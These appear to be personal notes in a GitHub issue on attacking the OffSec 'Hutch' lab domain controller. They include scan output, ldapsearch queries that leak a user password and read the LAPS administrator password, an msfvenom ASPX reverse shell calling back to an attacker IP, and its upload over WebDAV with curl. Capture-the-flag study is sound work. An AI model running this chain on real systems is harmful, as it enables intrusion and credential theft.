Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-03 03:13:18Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49878/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
80/tcp feroxbuster -u http://192.168.241.122 -k -C 404,503,502 --> no useful info
139/tcp
crackmapexec smb 192.168.241.122 --shares
-->
SMB 192.168.241.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
smbclient --no-pass //hutch.offsec/HUTCHDC/
--->
Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
389/tcp (LDAP) nmap -->
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=hutch,DC=offsec
| ldapServiceName: hutch.offsec:hutchdc$@HUTCH.OFFSEC
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
.....
ldapsearch -H ldap://192.168.241.122 -x -s base namingcontexts ldapsearch -x -H ldap://192.168.241.122 -D '' -w '' -b "DC=hutch,DC=offsec" ---> fmcsorley:CrabSharkJellyfish192
crackmapexec smb 192.168.241.122 --shares -u fmcsorley -p CrabSharkJellyfish192
smbclient //hutch.offsec/NETLOGON --user fmcsorley%CrabSharkJellyfish192
--> failed
ldapsearch -x -H ldap://192.168.241.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
impacket-psexec "HUTCH/Administrator@192.168.241.122"
Nikto for 80/tcp --> webdav is enabled.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=80 --platform Windows -a x64 -f aspx -o shell.aspx
curl -T '/home/kali/shell.aspx' 'http://192.168.241.122/' -u fmcsorley:CrabSharkJellyfish192
## -T , --upload-file
Browsing to 192.168.241.122/shell.aspx
--> Got a reverse shell
See https://juggernaut-sec.com/proving-grounds-hutch/
Unfortunately, due to this being a Server 2019 machine we will not be able to utilize a Potato attack; however, this version of Windows Server is vulnerable to PrintSpoofer!
Keypoints: ldap
ldapsearch -H ldap://192.168.241.122 -x -s base namingcontexts
ldapsearch -x -H ldap://192.168.241.122 -D '' -w '' -b "DC=hutch,DC=offsec"
--> find info about password settingldapsearch -x -H ldap://192.168.241.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
--> get administration's password.curl -T '/home/kali/shell.aspx' 'http://192.168.241.122/' -u fmcsorley:CrabSharkJellyfish192